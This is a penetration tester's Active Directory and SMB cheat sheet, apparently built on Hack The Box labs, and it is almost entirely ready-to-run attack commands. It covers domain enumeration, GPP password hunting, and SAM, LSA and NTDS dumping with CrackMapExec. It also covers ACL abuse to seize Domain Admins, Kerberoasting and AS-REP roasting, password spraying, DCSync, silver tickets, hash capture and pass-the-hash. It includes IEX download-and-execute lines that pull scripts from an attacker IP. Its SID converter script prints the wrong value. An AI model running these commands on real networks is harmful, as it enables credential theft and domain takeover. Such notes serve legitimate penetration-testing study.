Active Directory / SMB

00. Basic Notes

• MindMap

• Whatever account ends with $ sign that means it ether a machine account or a manage service account.

• SID structure.

## ------------------| Generate NTLM hashes using password
iconv -f ASCII -t UTF-16LE <(printf "<Password>") | openssl dgst -md4

• objectSid to SID representation

import sys
import base64
import struct

def convert(binary):
    version = struct.unpack('B', binary[0:1])[0]
    # I do not know how to treat version != 1 (it does not exist yet)
    assert version == 1, version
    length = struct.unpack('B', binary[1:2])[0]
    authority = struct.unpack(b'>Q', b'\x00\x00' + binary[2:8])[0]
    string = 'S-%d-%d' % (version, authority)
    binary = binary[8:]
    assert len(binary) == 4 * length
    for i in range(length):
        value = struct.unpack('<L', binary[4*i:4*(i+1)])[0]
        string += '-%d' % value
    return string

print(base64.b64decode(sys.argv[1]))

##python3 binary2SID.py <base64==>

• Basic commands

## ------------------| Joined/Connect to domain?
##[Windows]
systeminfo | findstr /B "Domain"
### If you see something other than Domain: WORKGROUP, then you are likely joined to a domain
##[Linux]
ls -al /etc/krb5.conf
kinit -k host/$(hostname -f)

## ------------------| Enumerating Domain Admins
net group "Domain Admins" /domain

## ------------------| Enumerating server admins
net group "Server_Admin" /domain

## ------------------| List all users on entire domain
net user /domain

## ------------------| List all groups
net group /domain

## ------------------| List groups for h4rith user
net user h4rith /domain

## ------------------| Current domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

## ------------------| Domain trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

## ------------------| Current forest info
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

## ------------------| Get forest trust relationships
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()

## ------------------| Get DCs of a domain
nltest /dclist:offense.local
net group "domain controllers" /domain

## ------------------| Get DC for currently authenticated session
nltest /dsgetdc:offense.local

## ------------------| Get domain trusts from cmd shell
nltest /domain_trusts

## ------------------| Get user info
nltest /user:"spotless"

## ------------------| List smb shares
Get-SmbShare
Get-SmbShare -Name C$ | select *

## ------------------| Creating a new file share
New-SmbShare -Name <ShareName> -Description "This is description" -Path C:\Shares\<ShareName>      

## ------------------| Modifying share properties
Set-SmbShare -Name <ShareName> -Description "This is description" -Force

## ------------------| Granting file share permissions.
Grant-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -AccessRight Full -Force
## You can use Everyone insted of <DOMAIN>\<USER>
## You can use Read,Change,Custom insted of Full.

## ------------------| Removing file share permissions
Revoke-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
## You can use Everyone insted of <DOMAIN>\<USER>

## ------------------| Denying permissions to a file share
Block-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
UnBlock-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
## You can use Everyone insted of <DOMAIN>\<USER

## ------------------| Removing a file share
Remove-SmbShare -Name <ShareName> -Force

## ------------------| Get DC for currently authenticated session
set l

## ------------------| Get domain name and DC the user authenticated to
klist

## ------------------| Get all logon sessions. Includes NTLM authenticated sessions
klist sessions

## ------------------| Kerberos tickets for the session
klist

## ------------------| Kached krbtgt
klist tgt

## ------------------| Whoami on older Windows systems
set u

## ------------------| Find DFS shares with ADModule
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name

## ------------------| Find DFS shares with ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name}

## ------------------| Check if spooler service is running on a host
powershell ls "\\dc01\pipe\spoolss"

• Find GPP Passwords in SYSVOL

## ------------------| Manual
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml

## ------------------| PowerSploit
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1 
IEX(New-Object Net.WebClient).DownloadString('http://<IP>/Get-GPPPassword.ps1')
Get-GPPPassword

• List of groups.

## ------------------| Add to the Remote Desktop Users
net localgroup "Remote Desktop Users" harith /add

## ------------------| Add to the WinRM Users
net localgroup "Remote Management Users" harith /add

## ------------------| Add to the Administrator group
net localgroup "Administrators" harith  /add

01. SMB Enumerations

00. Basic

• Find smb version

sudo tcpdump -s0 -n -i tun0 src $IP and port 139 -A -c 10 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.'        
sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L //$IP

01. SMBclient

## ------------------| List all 
smbclient -N -L //<IP>

## ------------------| For old smba versions
smbclient -N //<IP>/ --option='client min protocol=NT1' 

## ------------------| Download all files
smbclient -N //<IP>/<SHARENAME> -U <USERNAME> -c "prompt OFF;recurse ON;mget *"

## ------------------| Login to the user
smbclient -U '<UserName>%<Password> \\\\10.10.10.178\\c$

## ------------------| List info about 
## if it has ACL:Everyone:ALLOWED/OI|CI/FULL we can write/read
smbcacls -N //10.10.10.103/Department /Users

02. CrackMapExec

## ------------------| Enumarate hosts
crackmapexec smb 192.168.3.201-203

## ------------------| Tricks
## Crackmapexec try to authenticate to domain account instead of local user accounts in default
## so use -d WORKGROUP to try with local user account

## ------------------| Enumarate shares / Basic info
crackmapexec smb 10.10.10.178
crackmapexec smb 10.10.10.161 --shares
crackmapexec smb 10.10.10.161 -u '' -p '' --shares
crackmapexec smb 10.10.10.161 -u 'DoseNotExist' -p '' --shares
crackmapexec smb 10.10.10.161 -u 'DoseNotExist' -H <NThash>
crackmapexec smb 10.10.10.161 -d WORKGROUP -u 'DoseNotExist' -H <NThash>

## ------------------| Enumerate active sessions
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --sessions 

## ------------------| Enumerate disks
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --disks

## ------------------| Enumerate logged on users
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --loggedon-users

## ------------------| Enumerate domain users
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --users

## ------------------| Enumerate users by bruteforcing RID
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --rid-brute

## ------------------| Enumerate domain groups
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --groups

## ------------------| Enumerate local groups
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --local-groups

## ------------------| Identify SMB Signing Disabled
crackmapexec smb --gen-relay-list output.txt 10.10.10.0/24

## ------------------| Enumarate password policy
## if Account Lockout Threshold: None; we can bruteforce 
crackmapexec smb 10.10.10.161 --pass-pol
crackmapexec smb 10.10.10.161 -u '' -p '' --pass-pol

## ------------------| Dump SAM/LSA/NTDS.dit
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --sam
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --lsa
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --ntds 
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --ntds vss

## ------------------| Execute Commands
## PowerShell 
crackmapexec winrm 10.10.10.169 -u melanie -p 'Welcome123!' -X "whoami /all"
## CMD
crackmapexec winrm 10.10.10.169 -u melanie -p 'Welcome123!' -x "whoami /all"

## ------------------| Crawling shares
crackmapexec smb 10.10.10.149 -u 'username' -p 'PassW0rd' -M spider_plus 

03. SMBMap

## ------------------| List shares
smbmap -H 10.10.10.178
smbmap -u 'anonymous' -H 10.10.10.134
smbmap -u 'anonymous' -p 'anonymous' -H 10.10.10.134

## ------------------| Recursively list
smbmap -R directory -H 10.10.10.100

## ------------------| Download file
smbmap -R directory -H 10.10.10.100 -A filename.txt -q

• General flag

-H HOST               IP of host
--host-file FILE      File containing a list of hosts
-u USERNAME           Username, if omitted null session assumed
-p PASSWORD           Password or NTLM hash
--prompt              Prompt for a password
-s SHARE              Specify a share (default C$), ex 'C$'
-d DOMAIN             Domain name (default WORKGROUP)
-P PORT               SMB port (default 445)
-v                    Return the OS version of the remote host
-x COMMAND            Execute a command ex. 'ipconfig /all'
-L                    List all drives on the specified host (requires ADMIN)
-R [PATH]             Recursively list dirs.
-r [PATH]             List contents of directory.
-g FILE               Output to a file in a grep friendly format,
--dir-only            List only directories, ommit files.
--depth DEPTH         Traverse a directory tree to a specific depth. 
--download PATH       Download a file from the remote system,
--upload              Upload a file to the remote system ex.
--delete PATH Delete a remote file, ex. 'C$\temp\msf.exe'
--skip                Skip delete file confirmation prompt

04. RPCClient

## ------------------| Login as user
rpcclient -U 'support' <IP>
rpcclient -U 'Administrator:Password' <IP>

## ------------------| Null auth
rpcclient -U '' <IP>

## ------------------| Enumarations
lookupnames Guest
enumdomusers
queryuser 0x450
enumprinters

## ------------------| Change users password
setuserinfo2 <UserAccount> 23 '<Password>'

## ------------------| Brute Forcing User RIDs
for i in $(seq 500 1100);do rpcclient -N -U "" <IP> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done    

05. Samrdump.py

impacket-samrdump <IP>

06. Evil-WinRm

## ------------------| Normal Usage
evil-winrm -u UserName -p Password -i 10.10.10.149 
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

## ------------------| With SSL (port 5986)
evil-winrm -S -i 10.10.10.103 -c amanda.cer -k amanda.key -P 5986
evil-winrm -S -i 10.10.10.103 -c amanda.cer -k amanda.key -u amanda -P 5986

## If get message like "The term 'Invoke-Expression' is not recognized as the name of a cmdlet"
## The the language is constrained in the remote computer. Try this!!!
sudo apt-get install gss-ntlmssp
pwsh
$pass = ConvertTo-SecureString '<PassWord>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<ACCOUNT_NAME>', $pass)   
Enter-PSSession --ComputerName <IP> -credential $cred -Authentication Negotiate

07. PsExec

## ------------------| Enable access to $ADMIN C$, IP$ (Windows Administrative Shares)
REG add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

## ------------------| If we have R&W on SMB shares
impacket-psexec HTB/James:'J@m3s_P@ssW0rd!'@10.10.10.52

## ------------------| If you have NTML Hash [PassTheHash]
impacket-psexec Administrator@10.10.10.161 -hashes <HASH>:<HASH>    

02. Active Directory Enumeration

00. Basic

• If you are in AD environment

## ------------------| Import ad module
Get-Module -Name ActiveDirectory -ListAvailable
Import-Module -Name ActiveDirectory

## ------------------| List all users + computer
Get-ADObject -LDAPFilter "(objectClass=user)"
Get-ADObject -LDAPFilter "(objectCategory=user)"
Get-ADObject -LDAPFilter "(&(!(objectClass=computer)(objectCategory=user)))"

## ------------------| List all users which start account name with h
Get-ADObject -LDAPFilter "(sAMAccountName=j*)"
Get-ADObject -LDAPFilter "(sAMAccountName=j*)" -Properties cn,objectSid,description,givenname,sn                     

## ------------------| List all users which has SPN (Service Principle Name) set;GetUserSPns
Get-ADObject -LDAPFilter "(servicePrincipalName=*)"
Get-ADObject -LDAPFilter "(servicePrincipalName=*)" -Properties servicePrincipalName

• Microsoft ActiveDirectory PowerShell ADModule

## ------------------| Setup
wget https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1
wget https://github.com/samratashok/ADModule/raw/master/Microsoft.ActiveDirectory.Management.dll
## First you need to import the dll file [Use Absolute Path or .\Microsoft.ActiveDirectory.Management.dll]
Import-Module C:\Full\Path\Microsoft.ActiveDirectory.Management.dll -Verbose
# or : Import-ActiveDirectory -ActiveDirectoryModule C:\Full\Path\Microsoft.ActiveDirectory.Management.dll
. .\Import-ActiveDirectory.ps1
Get-Command -Module ActiveDirectory

## ------------------| Basic Doamin Enum
Get-ADDomain                            # List current domain
Get-ADDomain -Identity <DomainName>     # List other domain info
(Get-ADDomain).DomainSID                # List domain SID value
Get-ADDomainController                  # List domain controllers
Get-ADDomainController -DomainName <Domain> -Discover

## ------------------| User Enumaration
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity <UserName> -Properties *
Get-ADUser -Filter * -Properties * | select Name
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Properties  | select Name 
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description   

## ------------------| Computer Enumaration
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter 'OperatingSystem -like "*Windows*"' -Properties OperatingSystem | select Name,OperatingSystem 
Get-ADComputer "<ComputerName>" –Properties * | Format-Table OperatingSystem,OperatingSystemVersion,OperatingSystemServicePack      

## ------------------| Domain Group Enumaration
Get-ADGroup -Filter * | select name
Get-ADGroup -Filter * -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"' | select name
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADPrincipalGroupMembership -Identity <UserName>

## ------------------| Enumerate Organizational units [OUs]
Get-ADOrganizationalUnit -Filter * -Properties * | select name

## ------------------| Enumerate ACL
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=<Domain>').Access
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=<Domain>').Access | select IdentityReference,ActiveDirectoryRights | fl

## ------------------| Enumerate Domain Trusts
Get-ADTrust -Filter *
Get-ADTrust -Identity <FQDN>

## ------------------| Enumerate Domain Forests
Get-ADForest
(Get-ADForest).Domains
Get-ADForest -Identity <FQDN>
Get-ADForest | select -ExpandProperty GlobalCatalogs
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

01. PowerView

• Abusing Active Directory ACLs/ACEs

• Common

## ------------------| Load the script remotely & locally
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/PowerView.ps1')
Import-Module .\PowerView.ps1
. .\PowerView.ps1

## ------------------| Enumerate Current Domain
Get-Domain
Get-Domain -Domain <DomainName>
Get-DomainSID

## ------------------| Enumerate Domain Controllers
Get-DomainController 
Get-DomainController -Domain <DomainName>

## ------------------| Enumerate Domain Computers
Get-NetComputer
Get-NetComputer | select name
Get-NetComputer | select Name,operatingsystem
Get-NetComputer -OperatingSystem "*Server 2016*" | select name,operatingsystem

## ------------------| Enumerate Domain Users
Get-DomainUser
Get-DomainUser -Identity <username>
Get-DomainUser | select cn
Get-DomainUser | select samaccountname,logoncount,lastlogon
Get-DomainUser -Identity <username> -Properties DisplayName, MemberOf,objectsid,useraccountcontrol | Format-List

## ------------------| Enumerate All Groups
Get-NetGroup
Get-NetGroup | select name
Get-NetGroup 'Domain Admins'
Get-NetGroup "*admin*"| select name 
Get-NetGroup -Domain <targetdomain> | select name
Get-NetGroupMember "Domain Admins" -Recurse | select MemberName

## ------------------| Enumerate Local Groups
Get-NetLocalGroup 
Get-NetLocalGroup | Select-Object GroupName
Get-NetLocalGroup -ComputerName <computername>
Get-NetGroup -UserName <"username">| select name
Get-NetGroupMember -MemberName "domain admins" -Recurse | select MemberName
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain

## ------------------| Enumerate Domain Policy
Get-DomainPolicy
(Get-DomainPolicy)."SystemAccess"
(Get-DomainPolicy)."kerberospolicy"
(Get-DomainPolicy -domain <DomainName>)."SystemAccess"

## ------------------| Enumerate Group Policy [GPO]
Get-NetGPO
Get-NetGPO | select displayname
Get-NetGPO -ComputerName <ComputeName>
Find-GPOComputerAdmin -ComputerName <ComputeName>
Find-GPOLocation -UserName <UserName> -Verbose

## ------------------| Enumerate Organizational Units [OUs]
Get-NetOU
Get-NetOU | select distinguishedname

## ------------------| Enumerate ACL
Invoke-ACLScanner -ResolveGUIDs # Time-consuming
Get-ObjectAcl -Identity <UserName> -ResolveGUIDs
Get-ObjectAcl -SamAccountName <UserName> -ResolveGUIDs 
Get-ObjectAcl -SamAccountName <UserName> -ResolveGUIDs | select ObjectDN,ActiveDirectoryRights | fl

## ------------------| Enumerate Domain Trusts
Get-DomainTrust
Get-DomainTrust -Domain <FQDN>

## ------------------| Enumerate Domain Forests
Get-Forest
Get-ForestTrust
Get-ForestDomain
Get-ForestGlobalCatalog
Get-Forest -Forest <Domain>
Get-ForestTrust -Forest <Domain>
Get-ForestDomain -Forest <Domain>
Get-ForestGlobalCatalog  -Forest <Domain>

## ------------------| List Domain or File Shares.
Find-DomainShare
Get-NetFileServer -Verbose
Invoke-ShareFinder -Verbose
Find-DomainShare -CheckShareAccess

## ------------------| Find sensitive files on computer in the domain
Invoke-FileFinder -Verbose

## ------------------| Request TGS
Request-SPNTicket 

## ------------------| Convert SID value to Name
"SID>" | Convert-SidToName

## ------------------| Kerberoast
Invoke-Kerberoast
Invoke-Kerberoast -Identity <UserName>

## ------------------| Impersonate a user
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<Domain>\<User>', $pass)
Invoke-UserImpersonation -Credential $cred
Invoke-RevertToSelf

## ------------------| Special Enumerations
## Find all machines on the domain where current account has local admin access
Find-LocalAdminAccess -Verbose ## Very Noisy
Invoke-EnumerateLocalAdmin -Verbose ## Need Admin Prv

## List all Logged / Active on users
Get-NetLoggedon
Get-NetLoggedon -ComputerName <TargetMachineName> | Format-Table -AutoSize
Get-NetSessiom -ComputerName <DCName> | Format-Table -AutoSize

## List all Service Accounts [SPNs]
Get-NetUser –SPN
Get-NetUser | Where-Object {$_.servicePrincipalName} | select samaccountname,serviceprincipalname | fl

## List all Accounts with Kerberos pre-auth disabled [AS-REP Roasting]
Get-DomainUser -PreauthNotRequired -Verbose

## Find all computers which has sessions
Invoke-UserHunter 
Invoke-UserHunter -Stealth ## Only target high value machines
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -GroupName "Domain Admins"

• Abusing WriteOwner

## ------------------| Change owner
Set-DomainObjectOwner -Identity <User1> -OwnerIdentity <User2>

## ------------------| Change Rights to reset password
Add-DomainObjectAcl -TargetIdentity Herman -PrincipalIdentity nico -Rights ResetPassword -Verbose  
# Password change is listed on PoweShell commands 👆👆

# ------------------| Change the ownership of group
## The cred isn’t necessary but...
$pass = ConvertTo-SecureString 'W3llcr4ft3d_4cls' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('object.local\maria', $SecPassword)
## Change the ownership of "Domain Admins" group
Set-DomainObjectOwner -Credential $cred -Identity "Domain Admins" -OwnerIdentity maria
## Give all rights to maria
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
## Maria can add themself to the group
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
## or net group "Domain Admins" maria /add /domain
net user maria

• Abusing ForceChangePassword

## ------------------| Reset password
$pass = ConvertTo-SecureString 'Password123!' -asPlainText -Force
Set-DomainUserPassword <UserName> -AccountPassword $pass -Verbose

## ------------------| Simple Powershell if you are on AD
Set-ADAccountPassword -Identity <UserName> -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)

• Abusing GenericAll

## ------------------| Add member to another group
$pass = ConvertTo-SecureString 'Password123!' -asPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\Herman',$pass)
Add-DomainGroupMember -Identity 'Backup_Admins' -Members Herman -Credential $cred
Get-DomainGroup -MemberIdentity Herman | select samaccountname

• Abusing GenericWrite

## ------------------| Setup
## The cred isn’t necessary but...
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<Domain>\<UserName>', $pass)

## ------------------| Method I
## Set a service principal name and kerberoast that account.
## To actually Kerberoast, We need to use an SPN with a valid format like MSSQLSvc/<Domain>:1433
Set-DomainObject -Identity <UserNameToSetSPN> -SET @{serviceprincipalname='MSSQLSvc/<Domain>:1433'}
## We can use inbuild binary : setspn -a MSSQLSvc/<Domain>:1433 <Domain>\<UserName>
## With creds : Set-DomainObject -Credential $cred -Identity <UserNameToSetSPN> -SET @{serviceprincipalname='MSSQLSvc/<Domain>:1433'}        
Get-DomainUser <UserNameToSetSPN> | Select serviceprincipalname
Get-DomainSPNTicket -SPN "MSSQLSvc/<Domain>:1433" -Credential $cred | fl
.\Rubeus.exe kerberoast /creduser:<Domain>\<UserName> /credpassword:Password123!

## ------------------| Method II
## Setting the logon script
cd C:\Windows\temp\
echo 'whoami > C:\\Windows\\temp\\poc.txt' > foo.ps1
Set-DomainObject -Credential $cred -Identity <UserName> -SET @{scriptpath='C:\\Windows\\temp\\\\foo.ps1'}

• Abusing AddKeyCredentialLink

## ------------------| Setup
wget https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_Any/Whisker.exe
.\Whisker.exe add /target:<UserName>
## Then run Rubeus command and get the NTLM hash
evil-winrm -i <IP> -u <UserName> -H <Hash>

02. GetADUsers

impacket-GetADUsers -all -dc-ip <IP> <domain>/<user>
impacket-GetADUsers -all -dc-ip <IP> <domain>/<user> -hashes <LM:NT>

03. GetUserSPNs

## ------------------| Without password
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user> -no-pass

## ------------------| With password
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user>:<password>
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user> -hashes <LM:NT>

## ------------------| Use Kerberos authentication. Grabs credentials from ccache file
impacket-GetUserSPNs -request -k -no-pass -dc-host dc1.scrm.local scrm.local/ksimpson

04. GetNPUsers

## ------------------| Check Kerberos pre-authentication disabled?
impacket-GetNPUsers -dc-ip <IP> <domain>/<user> -no-pass    
impacket-GetNPUsers -dc-ip <IP> -no-pass -usersfile /usr/share/seclists/Usernames/Names/names.txt <domain>/     

## ------------------| Common 
impacket-GetNPUsers -dc-ip <IP> -request '<domain>/'
impacket-GetNPUsers -dc-ip <IP> -request <domain>/<username>:<password>
impacket-GetNPUsers -dc-ip <IP> -request <domain>/<username> -hashes <LM:NT>

## ------------------| Get hashcat format
impacket-GetNPUsers -format hashcat -dc-ip <IP> -request '<domain>/'

05. BloodHound / SharpHound

• SharpHound

## ------------------| Load ShapHound.ps1
## If you are using Powershell script you need to download BloodHound 4.0.3 version
## https://github.com/BloodHoundAD/BloodHound/releases/tag/4.0.3
wget https://raw.githubusercontent.com/BloodHoundAD/BloodHound/d8163c0650ada9ef4a6ebc5e2dc8f5fde566e73f/Collectors/SharpHound.ps1      
IEX(New-Object Net.WebClient).DownloadString('http://<IP>/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All

## ------------------| Collect info
.\SharpHound.exe -c all,GPOLocalGroup,LoggedOn
.\SharpHound.exe -c all -d <DomainName>
.\SharpHound.exe --CollectionMethods all,GPOLocalGroup,LoggedOn

## ------------------| Usage
 -s, --searchforest Search all available domains in the forest
--stealth           Stealth Collection (Prefer DCOnly whenever possible!)
--outputprefix      String to prepend to output file names
--memcache          Keep cache in memory and don't write to disk
--zipfilename       Filename for the zip
--zippassword       Password protects the zip with the specified password
-c, --collectionmethods    (Default: Default) Collection Methods: Container, Group, LocalGroup, GPOLocalGroup,
                            Session, LoggedOn, ObjectProps, ACL, ComputerOnly, Trusts, Default, RDP, DCOM, DCOnly

• BloodHound-Python

## ------------------| Dump domain info
pip3 install bloodhound
bloodhound-python -u <username> -p '<password>' -d <domain> -ns <IP> --dns-tcp -c All

• LDAPDomainDump

## ------------------| Only Json output
ldapdomaindump --no-grep --no-html -o ldapinfo <IP> -u <domain>\\<username> -p <password>

## ------------------| Only HTML output
ldapdomaindump --no-json --no-grep -o ldapinfo <IP> -u <domain>\\<username> -p <password> 

• BloodHound.py

## ------------------| Run
python3 bloodhound.py -d <domain> -u <username> -p '<password>' -gc <domain> -c all -ns <IP>

## ------------------| Usage
-u              Username. Format: username[@domain]; If the domain is unspecified, the current domain is used.
-p              Password
-k              Use kerberos
--hashes        LM:NLTM hashes
-ns             Alternative name server to use for queries
--dns-tcp       Use TCP instead of UDP for DNS queries
--dns-timeout   DNS query timeout in seconds (default: 3)
-d              Domain to query.
-dc             Override which DC to query (hostname)
-gc             Override which GC to query (hostname)
-w              Number of workers for computer enumeration (default: 10)
-v              Enable verbose output

• BloodHound & neo4j raw queries. [source]

## ------------------| List all users
MATCH (u:User) return u
MATCH (u:User) return u LIMIT 10

## ------------------| List users with properties
MATCH (u:User) WHERE u.name CONTAINS "ADMIN" return u.name, u.displayname, u.description

## ------------------| List computers which enable LAPS
MATCH (c:Computer) RETURN c.haslaps, COUNT(*)

06. WindapSearch

## This tool is used to enumerating the domain via LDAP anonymous bind
/opt/windapsearch/windapsearch-linux-amd64 -d <IP> -m users --proxy 127.0.0.1:1080     

07. Kerbrute

## ------------------| User Enumarations
kerbrute userenum /usr/share/seclists/Usernames/Names/names.txt -d <domain> --dc <IP>     

## ------------------| Password Spray
kerbrute passwordspray <usernames.txt> -d <domain> --dc <IP> '<password>'

08. RPCDump.py

impacket-rpcdump <IP>

##  check if the spooler service is running
impacket-rpcdump <IP> | grep -A2 -B2 MS-RPRN

#One potential service that could be leveraged to escalate privileges in the 
#domain is the Spooler service. This service allows triggering authentication as the 
#computer account of the host it's running on. This can then be relayed or cracked

09. Covenant

## The SharpUp command can be used to run privilege escalation checks
sharpup audit

## The shellcmd grunt command is used to issue shell commands
shellcmd whoami

## Import PowerShell script
PowerShellImport // PowerView.ps1


## Execute powershell script
PowerShell Get-DomainComputer | Select name

## kerberoast the users, MakeToken before run this command
Rubeus kerberoast
Kerberoast <UserName> hashcat

## impersonate (login to user) users using the MakeToken command
MakeToken username domainname password LOGON32_LOGON_INTERACTIVE

## DCSync
DCSync Administrator

10. Dnstool (krbrelayx)

## ------------------| Add DNS Record
python3 dnstool.py -u 'intelligence\tiffany.molina' -p <password> -r h4rithd -a add -t A -d <myIP> <RemoteIP>       

#### -u intelligence\Tiffany.Molina - The user to authenticate as;
#### -p <password> - The user’s password;
#### --action add - Adding a new record;
#### --record h4rithd - The domain to add;
#### --data <MyIP> - The data to add, in this case, the IP to resolve h4rithd to;
#### --type A - The type of record to add.

## ------------------| Check if it success
nslookup 
> server <RemoteIP>
> h4rithd.intelligence.htb 
## If it display my ip; we are good!!

11. Steel Hash

## ------------------| Using Responder
sudo responder -I tun0

## ------------------| Using Metasploit
use auxiliary/server/capture/http_ntlm
set SRVPORT 80
set URIPATH /
set SRVHOST <MyIP>
set JOHNPWFILE passwords
run

12. gMSADumper

## ------------------| If it has ReadGMSAPassword 
python3 gMSADumper.py -u <user> -p <password_or_LM:NT> -l <ldap_server_ip> -d <domain>      

## ------------------| Can verify the hash using crackmapexc
crackmapexec smb 10.10.10.248 -u svc_int$ -H b98d4cef68f72a98dfeed732d1b1abca

^^ If you have the hash; you can genarate a silver ticket. 

13. getTGT.py

wget https://raw.githubusercontent.com/fortra/impacket/master/examples/getTGT.py
python3 getTGT.py <domain>/<username>:<password>

export KRB5CCNAME=<username>.ccache
klist 

14. getPac.py

## ------------------| Get Domain SID
impacket-getPac -targetUser Administrator <Domain>/<User>:<Password>

15. AS-REP Roasting

## ------------------| With Rubeus
.\Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat

## ------------------| With Impacket
impacket-GetNPUsers -dc-ip <IP> <domain>/<user> -no-pass    
impacket-GetNPUsers -dc-ip <IP> -no-pass -usersfile /usr/share/seclists/Usernames/Names/names.txt <domain>/     

16. DCSync Attack

## ------------------| Prerequisite
## Privileged account (administrators, Domain Admin or Enterprise Admin)

## ------------------| Ask for a credential for KRBTGT
.\mimikatz.exe "lsadump::dcsync" "/domain:<DOMIAIN> /user:krbtgt" "exit" >> DCSync.out

## ------------------| Ask for a credential for h4rithd user 
.\mimikatz.exe "lsadump::dcsync" "/domain:<DOMIAIN> /user:h4rithd" "exit" >> DCSync.out

17. Silver Ticket

• Prerequisite

## Domain Name                   --> systeminfo | findstr /B "Domain"
## Password for service account  --> perform kerberoasting or use mimikatz to dump the hash

## ------------------| Convert password to hash 
.\Rubeus.exe hash /password:<password>

• PassTheTicket with Rubeus

.\Rubeus.exe silver /service:<servicePrincipalName> /rc4:<NTML-HASH> /sid:<domain_sid> /user:<NonExistentUser> /domain:<domain_name> /ptt

• PassTheTicket with mimikatz

## ------------------| Flush & inject tickets
.\mimikatz.exe "kerberos::purge" "exit"
.\mimikatz.exe "kerberos::golden /user:<NonExistentUser> /domain:<domain_name> /sid:<domain_sid> /target:<FQHN_service_account> /service:HTTP /rc4:<ntml_hash> /ptt" "exit" >> mimikatz-silver.out       
                                                                                                  # ^ MSSQLSvc/SqlServer.htb.com                                                               
## ------------------| Get Shell
.\PsExec.exe -accepteula \\<FQHN_service_account> cmd 

• PassTheTicket with python

## ------------------| Need to sync date
sudo ntpdate <RemoteIP>

## ------------------| Get Silver Ticket
python3 /usr/share/doc/python3-impacket/examples/ticketer.py -nthash <ntml_hash> -domain-sid <domain_sid> -domain <domain_name> -user-id 500 Administrator -spn <FQHN_service_account>     
impacket-getST -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :<ntml_hash> -impersonate Administrator <domain_name>/<FQHN_service_account>    

#### -dc-ip 10.10.10.248
#### -spn - To get the SPN, that’s in the Node Info -> Node Properties section for the svc_int user in Bloodhound        
#### -hashes - the NTLM I collected earlier using gMSADumper.py
#### -impersonate - the user I want a ticket for

## ------------------| Login via silver ticket 
export KRB5CCNAME=Administrator.ccache  
impacket-psexec -k -no-pass Administrator@dc.intelligence.htb

18. Golden Ticket

• Prerequisite

## Impersonate user 
## Domain Name    --> systeminfo | findstr /B "Domain"
## SID            --> whoami /user  or Get-ADDomain <DOMAIN_NAME>
## Domain KRBTGT Account NTLM password hash    --> DCSync Attack

• With impacket

## ------------------| Get Domain SID
